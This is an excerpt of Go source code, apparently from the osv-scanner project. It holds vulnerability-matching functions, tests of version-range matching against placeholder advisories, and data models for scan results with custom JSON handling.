// Each "affected" entry is tried in turn. A package with no ecosystem but with
// both a commit and a version is matched by git repository plus listed
// version. Otherwise the entry must name the same ecosystem and package, and
// then matches when the version is listed, when a range contains it, or when
// the package has no version at all. An entry with neither ranges nor versions
// is logged and skipped.
func IsAffected(v *osvschema.Vulnerability, pkg *extractor.Package) bool {
	for _, affected := range v.GetAffected() {
		// assume we're dealing with a git-source package whose name is the git repository, and that the version is the tag
		// the underlying commit has been resolved to (somehow), meaning we can check if it's in the versions listed by the advisory
		gitSourced := imodels.Ecosystem(pkg).IsEmpty() && imodels.Commit(pkg) != "" && imodels.Version(pkg) != ""
		if gitSourced &&
			hasGitRangeForRepo(affected, imodels.Name(pkg)) &&
			slices.Contains(affected.GetVersions(), imodels.Version(pkg)) {
			return true
		}

		// Assume vulnerability has already been validated
		advisoryPkg := affected.GetPackage()
		if advisoryPkg == nil {
			continue
		}

		sameEcosystem := osvecosystem.MustParse(advisoryPkg.GetEcosystem()).Equal(imodels.Ecosystem(pkg))
		if !sameEcosystem || advisoryPkg.GetName() != imodels.Name(pkg) {
			continue
		}

		if len(affected.GetRanges()) == 0 && len(affected.GetVersions()) == 0 {
			cmdlogger.Warnf("%s does not have any ranges or versions - this is probably a mistake!", v.GetId())

			continue
		}

		switch {
		case slices.Contains(affected.GetVersions(), imodels.Version(pkg)):
			return true
		case rangeAffectsVersion(affected.GetRanges(), pkg):
			return true
		case imodels.Version(pkg) == "":
			// if a package does not have a version, assume it is vulnerable
			// as false positives are better than false negatives here
			return true
		}
	}

	return false
}

// PackageKey uniquely identifies a package in a vulnerability.
type PackageKey struct {
	Name      string
	Ecosystem string
	Purl      string
}

// NewPackageKey creates a PackageKey from osvschema.Package.
func NewPackageKey(pkg *osvschema.Package) PackageKey {
	var key PackageKey
	key.Name = pkg.GetName()
	key.Ecosystem = pkg.GetEcosystem()
	key.Purl = pkg.GetPurl()

	return key
}

// GetFixedVersions collects, per affected package, every value found in a
// "fixed" event of that package's ranges.
//
// Keys are built with an empty Purl, so packages are told apart by name and
// ecosystem only. When the ecosystem has a ":" suffix (as in "Debian:12"), the
// same fixed values are also filed under the ecosystem without the suffix.
// A package without any "fixed" event gets no entry at all, so an advisory with
// no fixes yields an empty, non-nil map. The range type is not checked: every
// range's "fixed" events are collected.
func GetFixedVersions(v *osvschema.Vulnerability) map[PackageKey][]string {
	fixedByPackage := make(map[PackageKey][]string)

	for _, affected := range v.GetAffected() {
		advisoryPkg := affected.GetPackage()
		if advisoryPkg == nil {
			continue
		}

		key := NewPackageKey(advisoryPkg)
		key.Purl = ""

		// Text before the first ":" is the ecosystem without its release suffix.
		baseEcosystem, _, hasSuffix := strings.Cut(key.Ecosystem, ":")

		for _, r := range affected.GetRanges() {
			for _, event := range r.GetEvents() {
				fixed := event.GetFixed()
				if fixed == "" {
					continue
				}

				fixedByPackage[key] = append(fixedByPackage[key], fixed)

				if hasSuffix {
					baseKey := key
					baseKey.Ecosystem = baseEcosystem
					fixedByPackage[baseKey] = append(fixedByPackage[baseKey], fixed)
				}
			}
		}
	}

	return fixedByPackage
}

================================================
FILE: internal/utility/vulns/vulnerability_test.go
================================================
package vulns_test

import (
	"testing"

	"github.com/google/osv-scalibr/extractor"
	"github.com/google/osv-scalibr/extractor/filesystem/os/dpkg/metadata"
	"github.com/google/osv-scalibr/inventory/osvecosystem"
	"github.com/google/osv-scalibr/purl"
	"github.com/google/osv-scanner/v2/internal/utility/vulns"
	"github.com/ossf/osv-schema/bindings/go/osvconstants"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
)

func expectIsAffected(t *testing.T, vuln *osvschema.Vulnerability, version string, expectAffected bool) {
	t.Helper()

	pkg := &extractor.Package{
		Name:     "my-package",
		Version:  version,
		PURLType: purl.TypeNPM,
	}

	if vulns.IsAffected(vuln, pkg) != expectAffected {
		if expectAffected {
			t.Errorf("Expected OSV to affect package version %s but it did not", version)
		} else {
t.Errorf("Expected OSV not to affect package version %s but it did", version) } } } func buildOSVWithAffected(affected ...*osvschema.Affected) *osvschema.Vulnerability { return &osvschema.Vulnerability{ Id: "1", Published: nil, Modified: nil, Details: "This is an open source vulnerability!", Affected: affected, } } func buildEcosystemAffectsRange(events ...*osvschema.Event) *osvschema.Range { return &osvschema.Range{Type: osvschema.Range_ECOSYSTEM, Events: events} } func buildSemverAffectsRange(events ...*osvschema.Event) *osvschema.Range { return &osvschema.Range{Type: osvschema.Range_SEMVER, Events: events} } func TestOSV_AffectsEcosystem(t *testing.T) { t.Parallel() type AffectsTest struct { Affected []*osvschema.Affected Ecosystem string Expected bool } tests := []AffectsTest{ {Affected: nil, Ecosystem: "Go", Expected: false}, {Affected: nil, Ecosystem: "npm", Expected: false}, {Affected: nil, Ecosystem: "PyPI", Expected: false}, {Affected: nil, Ecosystem: "", Expected: false}, { Affected: []*osvschema.Affected{ {Package: &osvschema.Package{Ecosystem: "crates.io"}}, {Package: &osvschema.Package{Ecosystem: "npm"}}, {Package: &osvschema.Package{Ecosystem: "PyPI"}}, }, Ecosystem: "Packagist", Expected: false, }, { Affected: []*osvschema.Affected{ {Package: &osvschema.Package{Ecosystem: "NuGet"}}, }, Ecosystem: "NuGet", Expected: true, }, { Affected: []*osvschema.Affected{ {Package: &osvschema.Package{Ecosystem: "npm"}}, {Package: &osvschema.Package{Ecosystem: "npm"}}, }, Ecosystem: "npm", Expected: true, }, } for i, tt := range tests { vuln := &osvschema.Vulnerability{ Id: "1", Published: nil, Modified: nil, Details: "This is an open source vulnerability!", Affected: tt.Affected, } if vulns.AffectsEcosystem(vuln, osvecosystem.MustParse(tt.Ecosystem)) != tt.Expected { t.Errorf( "Test #%d: Expected OSV to return %t but it returned %t", i, tt.Expected, !tt.Expected, ) } } // test when the OSV doesn't have an "Affected" vuln := &osvschema.Vulnerability{ Id: "1", 
Published: nil, Modified: nil, Details: "This is an open source vulnerability!", Affected: nil, } if vulns.AffectsEcosystem(vuln, osvecosystem.MustParse("npm")) { t.Errorf( "Expected OSV to report 'false' when it doesn't have an Affected, but it reported true!", ) } } func TestOSV_IsAffected_AffectsWithEcosystem_DifferentEcosystem(t *testing.T) { t.Parallel() vuln := buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemPyPI), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange(&osvschema.Event{Introduced: "0"}), }, }, ) for _, v := range []string{"1.0.0", "1.1.1", "2.0.0"} { expectIsAffected(t, vuln, v, false) } } func TestOSV_IsAffected_AffectsWithEcosystem_SingleAffected(t *testing.T) { t.Parallel() var vuln *osvschema.Vulnerability // "Introduced: 0" means everything is affected vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange(&osvschema.Event{Introduced: "0"}), }, }, ) for _, v := range []string{"1.0.0", "1.1.1", "2.0.0"} { expectIsAffected(t, vuln, v, true) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) // "Fixed: 1" means all versions after this are not vulnerable vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Fixed: "1"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0"} { expectIsAffected(t, vuln, v, false) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) // multiple fixes and introduced vuln = 
buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Fixed: "1"}, &osvschema.Event{Introduced: "2.1.0"}, &osvschema.Event{Fixed: "3.2.0"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0rc2", "2.0.1"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"2.1.1", "2.3.4", "3.0.0", "3.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"3.2.0", "3.2.1", "4.0.0"} { expectIsAffected(t, vuln, v, false) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) // "LastAffected: 1" means all versions after this are not vulnerable vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{LastAffected: "1"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc", "1.0.0"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.1", "1.1.0", "2.0.0"} { expectIsAffected(t, vuln, v, false) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) // mix of fixes, last_known_affected, and introduced vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Fixed: "1"}, &osvschema.Event{Introduced: "2.1.0"}, &osvschema.Event{LastAffected: "3.1.9"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { 
expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0rc2", "2.0.1"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"2.1.1", "2.3.4", "3.0.0", "3.0.0-rc", "3.1.9"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"3.2.0", "3.2.1", "4.0.0"} { expectIsAffected(t, vuln, v, false) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) } func TestOSV_IsAffected_AffectsWithEcosystem_MultipleAffected(t *testing.T) { t.Parallel() vuln := buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Fixed: "1"}, ), }, }, &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "2.1.0"}, &osvschema.Event{Fixed: "3.2.0"}, ), }, }, &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "3.3.0"}, &osvschema.Event{LastAffected: "3.5.0"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0rc2", "2.0.1"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"2.1.1", "2.3.4", "3.0.0", "3.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"3.2.0", "3.2.1", "4.0.0"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"3.3.1", "3.4.5"} { expectIsAffected(t, vuln, v, true) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) } func TestOSV_IsAffected_AffectsWithEcosystem_Unsorted(t *testing.T) { 
t.Parallel() vuln := buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Introduced: "2.1.0"}, &osvschema.Event{Fixed: "1"}, &osvschema.Event{LastAffected: "3.1.9"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0rc2", "2.0.1"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"2.1.1", "2.3.4", "3.0.0", "3.0.0-rc", "3.1.9"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"3.2.0", "3.2.1", "4.0.0"} { expectIsAffected(t, vuln, v, false) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) // zeros with build strings vuln = buildOSVWithAffected( &osvschema.Affected{ // golang.org/x/sys Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Fixed: "0.0.0-20220412211240-33da011f77ad"}, &osvschema.Event{Introduced: "0"}, ), }, }, &osvschema.Affected{ // golang.org/x/net Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildEcosystemAffectsRange( &osvschema.Event{Introduced: "0.0.0-20180925071336-cf3bd585ca2a"}, &osvschema.Event{Fixed: "0"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.14.0"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"0.0.0-20180925071336-cf3bd585ca2a"} { expectIsAffected(t, vuln, v, true) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) } func TestOSV_IsAffected_AffectsWithSemver_DifferentEcosystem(t *testing.T) { t.Parallel() vuln := buildOSVWithAffected( &osvschema.Affected{ Package: 
&osvschema.Package{Ecosystem: string(osvconstants.EcosystemPyPI), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange(&osvschema.Event{Introduced: "0"}), }, }, ) for _, v := range []string{"1.0.0", "1.1.1", "2.0.0"} { expectIsAffected(t, vuln, v, false) } } func TestOSV_IsAffected_AffectsWithSemver_SingleAffected(t *testing.T) { t.Parallel() var vuln *osvschema.Vulnerability // "Introduced: 0" means everything is affected vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange(&osvschema.Event{Introduced: "0"}), }, }, ) for _, v := range []string{"v1.0.0", "v1.1.1", "v2.0.0"} { expectIsAffected(t, vuln, v, true) } // "Fixed: 1" means all versions after this are not vulnerable vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Fixed: "1.0.0"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0"} { expectIsAffected(t, vuln, v, false) } // multiple fixes and introduced vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Fixed: "1"}, &osvschema.Event{Introduced: "2.1.0"}, &osvschema.Event{Fixed: "3.2.0"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0rc2", "2.0.1"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"2.1.1", "2.3.4", "3.0.0", "3.0.0-rc"} { 
expectIsAffected(t, vuln, v, true) } for _, v := range []string{"3.2.0", "3.2.1", "4.0.0"} { expectIsAffected(t, vuln, v, false) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) // "LastAffected: 1" means all versions after this are not vulnerable vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{LastAffected: "1.0.0"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc", "1.0.0"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.1", "1.1.0", "2.0.0"} { expectIsAffected(t, vuln, v, false) } // mix of fixes, last_known_affected, and introduced vuln = buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Fixed: "1"}, &osvschema.Event{Introduced: "2.1.0"}, &osvschema.Event{LastAffected: "3.1.9"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0rc2", "2.0.1"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"2.1.1", "2.3.4", "3.0.0", "3.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"3.2.0", "3.2.1", "4.0.0"} { expectIsAffected(t, vuln, v, false) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) } func TestOSV_IsAffected_AffectsWithSemver_MultipleAffected(t *testing.T) { t.Parallel() vuln := buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( 
&osvschema.Event{Introduced: "0"}, &osvschema.Event{Fixed: "1"}, ), }, }, &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "2.1.0"}, &osvschema.Event{Fixed: "3.2.0"}, ), }, }, &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "3.3.0"}, &osvschema.Event{LastAffected: "3.5.0"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0rc2", "2.0.1"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"2.1.1", "2.3.4", "3.0.0", "3.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"3.2.0", "3.2.1", "4.0.0"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"3.3.1", "3.4.5", "3.5.0"} { expectIsAffected(t, vuln, v, true) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) } func TestOSV_IsAffected_AffectsWithSemver_Unsorted(t *testing.T) { t.Parallel() // mix of fixes, last_known_affected, and introduced vuln := buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "0"}, &osvschema.Event{Introduced: "2.1.0"}, &osvschema.Event{Fixed: "1"}, &osvschema.Event{LastAffected: "3.1.9"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.1.0", "0.0.0.1", "1.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v := range []string{"1.0.0", "1.1.0", "2.0.0rc2", "2.0.1"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"2.1.1", "2.3.4", "3.0.0", "3.0.0-rc"} { expectIsAffected(t, vuln, v, true) } for _, v 
:= range []string{"3.2.0", "3.2.1", "4.0.0"} { expectIsAffected(t, vuln, v, false) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) // zeros with build strings vuln = buildOSVWithAffected( &osvschema.Affected{ // golang.org/x/sys Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Fixed: "0.0.0-20220412211240-33da011f77ad"}, &osvschema.Event{Introduced: "0"}, ), }, }, &osvschema.Affected{ // golang.org/x/net Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "0.0.0-20180925071336-cf3bd585ca2a"}, &osvschema.Event{Fixed: "0"}, ), }, }, ) for _, v := range []string{"0.0.0", "0.14.0"} { expectIsAffected(t, vuln, v, false) } for _, v := range []string{"0.0.0-20180925071336-cf3bd585ca2a"} { expectIsAffected(t, vuln, v, true) } // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) } func TestOSV_IsAffected_OnlyVersions(t *testing.T) { t.Parallel() vuln := buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: string(osvconstants.EcosystemNPM), Name: "my-package"}, Versions: []string{"1.0.0"}, }, ) expectIsAffected(t, vuln, "0.0.0", false) expectIsAffected(t, vuln, "1.0.0", true) expectIsAffected(t, vuln, "1.0.0-beta1", false) expectIsAffected(t, vuln, "1.1.0", false) // an empty version should always be treated as affected expectIsAffected(t, vuln, "", true) } func TestOSV_EcosystemsWithSuffix(t *testing.T) { t.Parallel() vuln := buildOSVWithAffected( &osvschema.Affected{ Package: &osvschema.Package{Ecosystem: "Debian:12", Name: "my-package"}, Ranges: []*osvschema.Range{ buildSemverAffectsRange( &osvschema.Event{Introduced: "0"}, ), }, 
}, ) pkg := &extractor.Package{ Name: "my-package", Version: "0.0.0", PURLType: purl.TypeDebian, Metadata: &metadata.Metadata{ OSID: "Debian", OSVersionID: "12", }, } if !vulns.IsAffected(vuln, pkg) { t.Errorf("Expected OSV to affect package version %s but it did not", "0.0.0") } } ================================================ FILE: internal/version/version.go ================================================ // Package version stores the version of osv-scanner. package version // OSVVersion is the current release version, you should update this variable when doing a release const OSVVersion = "2.3.4" ================================================ FILE: osv-scanner.toml ================================================ ================================================ FILE: pkg/models/cyclonedx.go ================================================ // Package models provides data models for osv-scanner. package models type CycloneDXVersion int const ( CycloneDXVersion14 CycloneDXVersion = iota CycloneDXVersion15 CycloneDXVersion16 ) ================================================ FILE: pkg/models/image.go ================================================ package models import "github.com/opencontainers/go-digest" type ImageOriginDetails struct { Index int `json:"index"` } type ImageMetadata struct { OS string `json:"os"` LayerMetadata []LayerMetadata `json:"layer_metadata"` BaseImages [][]BaseImageDetails `json:"base_images"` } type BaseImageDetails struct { Name string `json:"name"` // TODO: Not yet filled in Tags []string `json:"tags"` } type LayerMetadata struct { DiffID digest.Digest `json:"diff_id"` Command string `json:"command"` IsEmpty bool `json:"is_empty"` BaseImageIndex int `json:"base_image_index"` } ================================================ FILE: pkg/models/results.go ================================================ package models import ( "encoding/json" "fmt" "slices" "strings" "github.com/google/osv-scalibr/extractor" 
"github.com/google/osv-scalibr/inventory" "github.com/google/osv-scalibr/inventory/vex" "github.com/ossf/osv-schema/bindings/go/osvschema" "google.golang.org/protobuf/encoding/protojson" ) // VulnerabilityResults is the top-level struct for the results of a scan type VulnerabilityResults struct { Results []PackageSource `json:"results"` ExperimentalAnalysisConfig ExperimentalAnalysisConfig `json:"experimental_config"` ExperimentalGenericFindings []*inventory.GenericFinding `json:"experimental_generic_findings,omitempty"` ImageMetadata *ImageMetadata `json:"image_metadata,omitempty"` LicenseSummary []LicenseCount `json:"license_summary,omitempty"` } type LicenseCount struct { Name License `json:"name"` Count int `json:"count"` } // ExperimentalAnalysisConfig is an experimental type intended to contain the // types of analysis performed on packages found by the scanner. type ExperimentalAnalysisConfig struct { Licenses ExperimentalLicenseConfig `json:"licenses"` } type ExperimentalLicenseConfig struct { Summary bool `json:"summary"` Allowlist []License `json:"allowlist"` } // Flatten the grouped/nested vulnerability results into one flat array. 
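func (vulns *VulnerabilityResults) Flatten() []VulnerabilityFlattened {
	// Start from an empty, non-nil slice so the result is never nil, even when
	// there is nothing to report.
	results := []VulnerabilityFlattened{}

	for _, res := range vulns.Results {
		for _, pkg := range res.Packages {
			// One entry per vulnerability, each carrying the group it belongs to.
			for _, v := range pkg.Vulnerabilities {
				results = append(results, VulnerabilityFlattened{
					Source:        res.Source,
					Package:       pkg.Package,
					DepGroups:     pkg.DepGroups,
					Vulnerability: v,
					GroupInfo:     getGroupInfoForVuln(pkg.Groups, v.GetId()),
				})
			}

			// License violations get a single, separate entry per package.
			if len(pkg.LicenseViolations) > 0 {
				results = append(results, VulnerabilityFlattened{
					Source:            res.Source,
					Package:           pkg.Package,
					DepGroups:         pkg.DepGroups,
					Licenses:          pkg.Licenses,
					LicenseViolations: pkg.LicenseViolations,
				})
			}

			// A deprecated package also gets its own entry.
			if pkg.Package.Deprecated {
				results = append(results, VulnerabilityFlattened{
					Source:     res.Source,
					Package:    pkg.Package,
					Deprecated: pkg.Package.Deprecated,
				})
			}
		}
	}

	return results
}

// getGroupInfoForVuln returns the first group whose IDs contain vulnID.
//
// Every vulnerability is expected to belong to one group, but nothing in this
// file enforces that (for example when results are decoded from JSON through
// the UnmarshalJSON methods below). When no group matches, the zero GroupInfo
// is returned instead of indexing the slice with -1, which would panic. The
// zero value has no analysis entries, which GroupInfo.IsCalled treats as
// "called", so the finding is still reported rather than hidden.
func getGroupInfoForVuln(groups []GroupInfo, vulnID string) GroupInfo {
	groupIdx := slices.IndexFunc(groups, func(g GroupInfo) bool { return slices.Contains(g.IDs, vulnID) })
	if groupIdx < 0 {
		return GroupInfo{}
	}

	return groups[groupIdx]
}

// VulnerabilityFlattened is a flattened version of the VulnerabilityResults
// TODO: rename this to IssueFlattened or similar in the next major release as
// it now contains license violations.
type VulnerabilityFlattened struct {
	Source            SourceInfo
	Package           PackageInfo
	DepGroups         []string
	Vulnerability     *osvschema.Vulnerability
	GroupInfo         GroupInfo
	Licenses          []License
	LicenseViolations []License
	Deprecated        bool
}

// MarshalJSON implements the json.Marshaler interface.
// It is required because the Vulnerability field is a proto message,
// which requires protojson to marshal, while the rest of the struct uses
// the standard encoding/json library.
func (v *VulnerabilityFlattened) MarshalJSON() ([]byte, error) {
	// Use alias to avoid recursion: alias has the same fields but none of the
	// methods, so json.Marshal does not call MarshalJSON again.
	type alias VulnerabilityFlattened

	// Pre-process the custom field. A nil Vulnerability leaves the raw message
	// nil, which encoding/json writes as null.
	var rawVulnerability json.RawMessage
	if v.Vulnerability != nil {
		// protojson does not promise byte-stable output, so the message is
		// decoded into a generic value and re-encoded with encoding/json.
		unstableJSON, err := protojson.Marshal(v.Vulnerability)
		if err != nil {
			return nil, fmt.Errorf("failed to marshal Vulnerability: %w", err)
		}

		var vuln any
		if err := json.Unmarshal(unstableJSON, &vuln); err != nil {
			return nil, err
		}

		b, err := json.MarshalIndent(vuln, "", " ")
		if err != nil {
			return nil, err
		}
		rawVulnerability = b
	}

	// Marshal a temporary struct that combines the standard
	// fields (from the alias) with the custom-handled field.
	return json.Marshal(&struct {
		*alias

		Vulnerability json.RawMessage `json:"Vulnerability"`
	}{
		alias:         (*alias)(v),
		Vulnerability: rawVulnerability,
	})
}

// UnmarshalJSON implements the json.Unmarshaler interface.
// It is required because the Vulnerability field is a proto message,
// which requires protojson to unmarshal, while the rest of the struct uses
// the standard encoding/json library.
func (v *VulnerabilityFlattened) UnmarshalJSON(data []byte) error {
	// Unmarshal into a temporary struct with Vulnerability as json.RawMessage.
	// Use an alias to avoid an infinite recursion loop.
	type alias VulnerabilityFlattened
	tmp := &struct {
		*alias

		Vulnerability json.RawMessage `json:"Vulnerability"`
	}{
		alias: (*alias)(v),
	}

	// tmp is already a pointer. Passing &tmp would let a JSON null reset tmp
	// itself to nil, and the field access below would then dereference nil.
	// Decoding into tmp makes a null input a no-op, which is what encoding/json
	// expects of an Unmarshaler.
	if err := json.Unmarshal(data, tmp); err != nil {
		return err
	}

	// If there is a vulnerability, unmarshal it using protojson.
	if len(tmp.Vulnerability) > 0 && string(tmp.Vulnerability) != "null" {
		v.Vulnerability = &osvschema.Vulnerability{}
		if err := protojson.Unmarshal(tmp.Vulnerability, v.Vulnerability); err != nil {
			return err
		}
	}

	return nil
}

// SourceType categorizes packages based on the extractor that extracted
// the "source", for use in the output.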
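type SourceType string

// String values of SourceType as they appear in the "type" field of SourceInfo.
const (
	SourceTypeUnknown        SourceType = "unknown"
	SourceTypeOSPackage      SourceType = "os"
	SourceTypeProjectPackage SourceType = "lockfile"
	SourceTypeArtifact       SourceType = "artifact"
	SourceTypeSBOM           SourceType = "sbom"
	SourceTypeGit            SourceType = "git"
)

// SourceInfo identifies a scanned source by its path and its SourceType.
type SourceInfo struct {
	Path string     `json:"path"`
	Type SourceType `json:"type"`
}

// Metadata carries a repository URL and dependency groups.
// DepGroups is excluded from the JSON encoding.
type Metadata struct {
	RepoURL   string   `json:"repo_url"`
	DepGroups []string `json:"-"`
}

// String renders the source as "<type>:<path>".
func (s SourceInfo) String() string {
	return string(s.Type) + ":" + s.Path
}

// PackageSource represents Vulnerabilities associated with a Source
type PackageSource struct {
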